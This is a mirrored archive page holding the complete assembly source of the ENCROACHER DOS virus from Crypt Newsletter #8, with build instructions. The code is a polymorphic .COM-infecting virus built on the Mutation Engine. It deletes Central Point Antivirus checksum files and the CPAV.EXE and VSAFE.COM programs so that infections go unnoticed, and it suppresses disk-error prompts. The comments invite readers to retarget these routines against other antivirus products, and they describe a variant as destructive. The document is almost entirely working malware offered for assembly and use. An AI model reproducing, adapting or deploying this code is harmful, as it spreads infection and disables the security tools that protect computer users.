mirror of
https://github.com/vxunderground/MalwareSourceCode
synced 2024-06-27 09:28:25 +00:00
339 lines
12 KiB
NASM
339 lines
12 KiB
NASM
;***************************************************************************
|
|
; The ENCROACHER virus: Incorporating anti-virus software countermeasures
|
|
; to aid in gaining and maintaining a foothold on a CENTRAL POINT ANTIVIRUS
|
|
; protected system. Some of the ideas in ENCROACHER were inspired by Mark
|
|
; Ludwig's RETALIATOR virus (American Eagle Publishing) and Nowhere Man's
|
|
; VCL 1.0 viral assembly code library. ENCROACHER also utilizes the Mutation
|
|
; Engine for polymorphism. Edited by URNST KOUCH for Crypt Newsletter #8.
|
|
;
|
|
; 1. Assemble with TASM 2.5 with the aid of MAKE.BAT, included in issue #8.
|
|
; 2. The reader must also have the MtE091b object files (not included in
|
|
; the newsletter but commonly available as the Mutation Engine at most
|
|
; good virus info archive sites.)
|
|
; 3. Place all files in ENCROACHER assembly directory.
|
|
; 4. Execute MAKE.BAT with TASM 2.5 and TLINK.EXE in path.
|
|
;
|
|
; ENCROACHER is a simple .COM appending virus which strikes the Central Point
|
|
; Anti-virus software in a direct manner. CPAV stores a file called
|
|
; chklist.cps in every directory that contains executable programs. This file
|
|
; contains the integrity (or checksum) data on each program in that
|
|
; directory. It is the library file that CPAV refers to when scanning for
|
|
; unknown viruses. By comparing 'newly checksummed' files with its data
|
|
; in chklist.cps, CPAV locates change, corruption or generic virus infection.
|
|
; Eliminating these files before virus infection forces Central Point
|
|
; Antivirus to create new 'checklist' data for the directory, AFTER the
|
|
; virus has acted. Therefore, the virus-infected file becomes
|
|
; a legal part of Central Point's freshly calculated integrity data.
|
|
; Upon call, ENCROACHER will ALWAYS check for and erase these files, forcing
|
|
; the anti-virus software to constantly update its data, effectively
|
|
; making this feature unreliable. In my experience,
|
|
; the CPAV software does not protest the elimination of these files in an
|
|
; appropriate manner.
|
|
;
|
|
; ENCROACHER will also attempt to erase the main CENTRAL POINT A-V program
|
|
; in its default installation directory before infection. This is a
|
|
; direct attack and is more likely to be noticed than the
|
|
; disappearance and reappearance of dozens of very small chklist.cps
|
|
; files. Because it is a strong move, one can be of mixed mind about using it.
|
|
; An alert user SHOULD recognize something wrong almost immediately.
|
|
; However, it is included to illustrate the point that while it presumes
|
|
; apriori knowledge concerning the location of CPAV software on the system,
|
|
; many users can STILL be expected to be lazy (and/or stupid) and use the
|
|
; vulnerable shrink-wrapped software recommendations for installation.
|
|
;
|
|
; ENCROACHER will also target and delete VSAFE.COM, CPAV's most powerful
|
|
; program for the detection of virus-mediated opening, closing and writing
|
|
; to files. (The CPAV software also contains VSAFE as a device, VSAFE.SYS.
|
|
; The user may add attack of this component to the source code if he wishes.)
|
|
; If Central Point's DEFAULT installation is in place and VSAFE is in
|
|
; memory, ENCROACHER will remove it since, generally, the program
|
|
; is merely configured to scan for known viruses, add chklist.cps files
|
|
; to program directories and lock out writes to the boot record. If all
|
|
; of VSAFE's features are enabled, ENCROACHER WILL BE detected when it
|
|
; attempts to destroy VSAFE. However, since these VSAFE features are
|
|
; not practical for everyday computing needs, it can be
|
|
; assumed relatively safe to disregard them as a threat to ENCROACHER. (The
|
|
; reader is invited to add a routine which will make a call to VSAFE
|
|
; if in memory. If VSAFE is resident, the routine could be written to
|
|
; instruct the virus to go to sleep until the danger is past.)
|
|
;
|
|
; Central Point Anti-virus contains a third program known as VWATCH. It
|
|
; can be safely ignored by ENCROACHER.
|
|
;
|
|
; ENCROACHER's anti-virus software countermeasures can be quickly adapted
|
|
; to almost any commercial software of choice. Access to manuals or
|
|
; copies of the Norton Antivirus, Fifth Generation's Untouchable or
|
|
; Leprechaun Software's Virus-Buster have all the information needed to
|
|
; allow the homebrew researcher to reconfigure the virus so that it can
|
|
; attack these programs in an educated manner.
|
|
;
|
|
; ENCROACHER2 is a variant of ENCROACHER supplied as a DEBUG script.
|
|
; In addition to it's anti- CPAV capability, ENCROACHER2 will poison selected
|
|
; programs sometime in the evening hours.
|
|
;
|
|
; General features: ENCROACHER will infect all .COM programs in its current
|
|
; directory. When finished, it will jump to the root of the current directory
|
|
; and continue its work.
|
|
; ENCROACHER WILL NOT restore the DTA, producing a shift at the prompt.
|
|
; (Sorry, deadline was approaching for the newsletter and I had to get this
|
|
; baby to bed.)
|
|
;
|
|
; ENCROACHER has no problem infecting COMMAND.COM or NDOS.COM! The operating
|
|
; system WILL continue to load properly. ENCROACHER quickly deletes
|
|
; Central Point software programs on start-up. There is no noticeable
|
|
; delay in infection times between it and a copy of the virus lacking
|
|
; these features.
|
|
; ENCROACHER will quickly infect down the trunk of any directory structure.
|
|
;
|
|
; Keep in mind, that ENCROACHER 2 can be frustratingly destructive once
|
|
; it has spread out onto a system.
|
|
|
|
|
|
.model tiny
|
|
.radix 16
|
|
.code
|
|
|
|
extrn mut_engine: near, rnd_get: near, rnd_init: near
|
|
extrn rnd_buf: word, data_top: near
|
|
|
|
org 100h
|
|
|
|
start:
|
|
call locadr
|
|
reladr:
|
|
db 'ENCROACHER is here'
|
|
|
|
locadr:
|
|
pop dx
|
|
mov cl,4
|
|
shr dx,cl
|
|
sub dx,10
|
|
mov cx,ds
|
|
add cx,dx ;Calculate new CS
|
|
mov dx,offset begin
|
|
push cx dx
|
|
retf
|
|
begin:
|
|
cld
|
|
mov di,offset start
|
|
push es di
|
|
push cs
|
|
pop ds
|
|
mov si,offset old_cod
|
|
movsb ;Restore first 3 bytes
|
|
movsw
|
|
push ax
|
|
mov dx,offset dta_buf ;Set DTA
|
|
mov ah,1a
|
|
int 21
|
|
mov ax,3524 ;Hook INT 24
|
|
int 21
|
|
push es bx
|
|
mov dx,offset fail_err
|
|
mov ax,2524
|
|
int 21
|
|
killcps: ; clear CPS integrity files from startup directory
|
|
mov dx,offset killfile ; DX points to data mask: chklist.cps
|
|
mov ah,04Eh ; DOS find first file function
|
|
mov cx,00100111b ; All file attributes valid
|
|
int 021h
|
|
jc erase_done ; Exit procedure on failure
|
|
mov ah,02Fh ; DOS get DTA function
|
|
int 021h
|
|
lea dx,[bx + 01Eh] ; DX points to filename in DTA
|
|
erase_loop:
|
|
mov ah,041h ; DOS delete file function
|
|
int 021h
|
|
mov ah,03Ch ; DOS create file function
|
|
xor cx,cx ; No attributes for new file
|
|
int 021h
|
|
mov ah,041h ; DOS delete file function
|
|
int 021h
|
|
mov ah,04Fh ; DOS find next file function
|
|
int 021h
|
|
jnc erase_loop ; Repeat until no files left
|
|
erase_done:
|
|
|
|
|
|
jmp killcpav ; chklist.cps gone, go for CPAV.EXE
|
|
; in factory installation
|
|
|
|
|
|
killcpav: ; clear CPAV master executable from default directory
|
|
mov dx,offset killfile2 ; DX points to filename
|
|
mov ah,41h ; DOS erase file function
|
|
int 21h
|
|
jc killvsafe
|
|
|
|
killvsafe:
|
|
mov dx,offset killfile3
|
|
mov ah,41h
|
|
int 21h
|
|
jc erase_done2
|
|
|
|
erase_done2:
|
|
jmp getonwithit
|
|
|
|
getonwithit: ;get on with infecting files
|
|
xor ax,ax ;Initialize random number generator
|
|
mov [rnd_buf],ax ;for Mutation Engine use
|
|
call rnd_init
|
|
push sp
|
|
pop cx
|
|
sub cx,sp
|
|
add cx,4
|
|
push cx
|
|
|
|
find_lup1:
|
|
mov dx,offset srchnam ;COMfile mask for clean file search
|
|
mov cl,3
|
|
mov ah,4e ;find a file
|
|
|
|
find_lup2:
|
|
int 21 ;Find the next COM file
|
|
jc ch_dir ;if no files or no uninfected files in current dir, change to root
|
|
cmp [dta_buf+1a],ch
|
|
jnz infect ;If not infected, infect it now
|
|
pop cx
|
|
find_nxt:
|
|
push cx
|
|
mov dx,offset dta_buf
|
|
mov ah,4f ;found an infected file, find another
|
|
jmp find_lup2
|
|
|
|
ch_dir:
|
|
mov dx,offset dotdot
|
|
mov ah,3bh ; Change directory to root of current
|
|
int 21h
|
|
jnc find_lup1 ; Carry set if in root
|
|
; loop to search for clean files
|
|
infect_done:
|
|
pop cx
|
|
loop find_nxt
|
|
jnc exit2
|
|
call rnd_get ;extraneous garbage code
|
|
test al,1 ; " " "
|
|
jz exit2 ; " " "
|
|
|
|
exit1: popf ;return control and get set to clean up
|
|
|
|
exit2:
|
|
pop dx ds
|
|
mov ax,2524 ;Restore old INT 24
|
|
int 21
|
|
push ss
|
|
pop ds
|
|
mov dx,80 ;Restore DTA
|
|
mov ah,1a
|
|
int 21
|
|
push ds ;Exit to host program
|
|
pop es
|
|
pop ax
|
|
retf
|
|
infect:
|
|
xor cx,cx ;Reset read-only attribute
|
|
mov dx,offset dta_buf+1e
|
|
mov ax,4301
|
|
int 21
|
|
jc infect_done ;if fail, get set to leave
|
|
mov ax,3d02 ;Open the file
|
|
int 21
|
|
jc infect_done ;if fail, get set to leave
|
|
xchg ax,bx
|
|
mov dx,offset old_cod ;Read first 3 bytes
|
|
mov cx,3
|
|
mov ah,3f
|
|
int 21
|
|
jc read_done ;file already infected, skip it
|
|
mov ax,word ptr [old_cod] ;Make sure it's not an EXE file
|
|
cmp ax,'ZM'
|
|
jz read_done ;if it is, skip it
|
|
cmp ax,'MZ'
|
|
jz read_done
|
|
xor cx,cx ;Seek to end of file
|
|
xor dx,dx
|
|
mov ax,4202
|
|
int 21
|
|
test dx,dx ;Make sure the file is not too big
|
|
jnz read_done
|
|
cmp ax,-2000
|
|
jnc read_done
|
|
mov bp,ax
|
|
sub ax,3
|
|
mov word ptr [new_cod+1],ax
|
|
mov ax,5700 ;Save file's date/time
|
|
int 21
|
|
push dx cx
|
|
mov ax,offset data_top+0f
|
|
mov cl,4 ;Now call the Mutation Engine
|
|
shr ax,cl
|
|
mov cx,cs
|
|
add ax,cx
|
|
mov es,ax
|
|
mov dx,offset start ;dx points to start of ENCROACHER
|
|
mov cx,offset _DATA ;cx contains ENCROACHER length
|
|
push bp bx
|
|
add bp,dx ;bp contains address where MtE hands control to ENCROACH
|
|
xor si,si ;si=0, MtE required value
|
|
xor di,di ;di=0, MtE required value
|
|
mov bl,0f ;bl=0f,MtE 'medium' model required
|
|
mov ax,101 ;set bit-field in ax, MtE values
|
|
call mut_engine
|
|
pop bx ax
|
|
add ax,cx ;Make sure file length mod 256 = 0
|
|
neg ax
|
|
xor ah,ah
|
|
add cx,ax
|
|
mov ah,40 ;Put the virus into the file
|
|
int 21
|
|
push cs
|
|
pop ds
|
|
sub cx,ax
|
|
xor dx,dx ;Write the JMP instruction
|
|
mov ax,4200
|
|
int 21
|
|
mov dx,offset new_cod
|
|
mov cx,3
|
|
mov ah,40
|
|
int 21
|
|
write_done:
|
|
pop cx dx ;Restore file's date/time
|
|
mov ax,5701
|
|
int 21
|
|
jmp read_done2
|
|
|
|
read_done:
|
|
mov ah,3e ;Close the file
|
|
int 21
|
|
jmp infect_done ;in this case, no infection so
|
|
;try for another search
|
|
read_done2:
|
|
mov ah,3e
|
|
int 21
|
|
jmp exit1 ;successfully infected file,
|
|
;jump to host execution
|
|
fail_err: ;Critical error handler
|
|
mov al,3 ;protects ENCROACHER from exposing
|
|
iret ;itself on a write-protected disk
|
|
;or diskette
|
|
|
|
srchnam db '*.COM',0
|
|
killfile db 'CHKLIST.CPS',0 ;CPAV file integrity data archive
|
|
killfile2 db 'C:\CPAV\CPAV.EXE',0 ;default location and name of
|
|
;CPAV master program
|
|
killfile3 db 'C:\CPAV\VSAFE.COM',0 ;CPAV r/w resident protection program
|
|
|
|
old_cod: ;Buffer to read first 3 bytes
|
|
ret
|
|
dw ?
|
|
|
|
new_cod: ;Buffer to write first 3 bytes
|
|
jmp $+100
|
|
|
|
.data
|
|
|
|
dotdot db '..',0 ;change directory trick
|
|
dta_buf db 2bh dup(?) ;Buffer for DTA
|
|
|
|
end start
|